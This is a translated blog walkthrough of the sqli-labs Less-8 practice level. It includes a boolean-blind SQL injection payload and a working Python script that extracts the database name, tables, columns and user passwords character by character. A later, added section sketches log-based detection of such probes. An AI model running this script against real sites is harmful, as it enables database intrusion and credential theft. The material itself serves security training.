sqlilabs less-8
2022-07-01 14:03:00 【永远是深夜该多好。】
First determine whether the injection point is numeric or string-based.
Appending a character to the number still returns a normal page, so this is a string-type injection. Next, construct the payload. Because this level only returns whether the query was correct or not, use blind injection.
First determine the length of the database name.
Then determine the database name.
This uses substr(content, n, m), which takes m characters from content starting at position n, and length(), plus one key SQL statement:
?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='u'--+
The workload is fairly large, so consider Burp Suite or a script:
import requests

url = 'http://localhost/sqlilabs/Less-8/?id=1\''
datalens = 0
datanamee = ''
sign = "You are in..........."   # text Less-8 shows only when the injected condition is true
tablename = ''
columnlist = ''
list1 = ['id', 'username', 'password', 'user', 'currentconnections', 'totalconnections']
valuelist = ''

# database name length
for i in range(10):
    rl = str(i)
    lenurl = url + " and length(database())=" + rl + "--+"
    r = requests.get(lenurl)
    if sign in r.text:
        print("database len " + str(i))
        datalens = i + 1

# database name, one character at a time
wordlist = "abcdefghijklmnopqrstuvwxyz"
for i in range(1, datalens):
    dataname = url + " and substr(database()," + str(i) + "," + "1)"
    for w in wordlist:
        datanames = dataname + "=" + "'" + w + "'" + "--+"
        r = requests.get(datanames)
        if sign in r.text:
            datanamee += w
            print("database name " + datanamee)

# table names in the current database (group_concat joins them with commas)
wordlist2 = "abcdefghijklmnopqrstuvwxyz,"
for i in range(1, 100):
    tableurl1 = url + " and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)="
    for v in wordlist2:
        tableurl = tableurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(tableurl)
        if sign in r.text:
            tablename += v
            print("database table " + tablename)

# column names of the users table
for i in range(1, 100):
    columnurl1 = url + " and substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\' )," + str(i) + ",1)="
    for v in wordlist2:
        columnurl = columnurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(columnurl)
        if sign in r.text:
            columnlist += v
            print("database column " + columnlist)
print(list1)

# rows: dump each column of users listed in list1
wordlist2 = "0123456789abcdefghijklmnopqrstuvwxyz,=-_/\\."
for n in range(6):
    for i in range(1, 200):
        valueurl1 = url + " and substr((select group_concat(" + list1[n] + ") from users )," + str(i) + ",1)="
        for v in wordlist2:
            valueurl = valueurl1 + "\'" + v + "\'" + "--+"
            r = requests.get(valueurl)
            if sign in r.text:
                valuelist += v
                print("database " + list1[n] + ' ' + valuelist)
    valuelist = ''
As is plain to see, the blogger's programming ability is lacking and needs improvement.
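The defender's side of the same technique, added here as an example that is not part of the original post: the probes above leave a recognisable shape in the web server access log (a closing quote, `and substr(` / `and length(`, a read of `information_schema`), and blind enumeration needs one request per candidate character, so the request volume per source is the tell. The log lines are constructed and the combined log format is assumed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (not real traffic), in combined log format:
# one ordinary request, then probes shaped like the ones the Less-8 script sends.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2022:14:03:00 +0800] "GET /sqlilabs/Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2022:14:03:01 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20length(database())%3D8--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2022:14:03:01 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),1,1)%3D%27s%27--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jul/2022:14:03:02 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()),1,1)%3D%27e%27--+ HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Building blocks of the boolean-blind probes described above, matched against the
# decoded parameter value: a quote closing the string literal followed by an AND on
# substr()/length(), or a read of information_schema.
PROBE_RE = re.compile(r"(?i)'\s*and\s+(substr|length)\s*\(|information_schema\.")

def parse_line(line):
    """Return source ip and decoded query parameters for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %27 becomes ' and %20 becomes a space
    params = parse_qs(urlparse(m.group("target")).query, keep_blank_values=True)
    return {"ip": m.group("ip"), "params": params}

def is_blind_probe(params):
    return any(PROBE_RE.search(v) for values in params.values() for v in values)

def probe_counts(log_text):
    """Number of probe-shaped requests per source address."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_blind_probe(rec["params"]):
            counts[rec["ip"]] += 1
    return counts

def suspicious_sources(log_text, threshold=3):
    """Sources whose probe count reaches the threshold (assumed value, tune per site)."""
    return sorted(ip for ip, n in probe_counts(log_text).items() if n >= threshold)

if __name__ == "__main__":
    print(probe_counts(SAMPLE_LOG))
    print(suspicious_sources(SAMPLE_LOG))
```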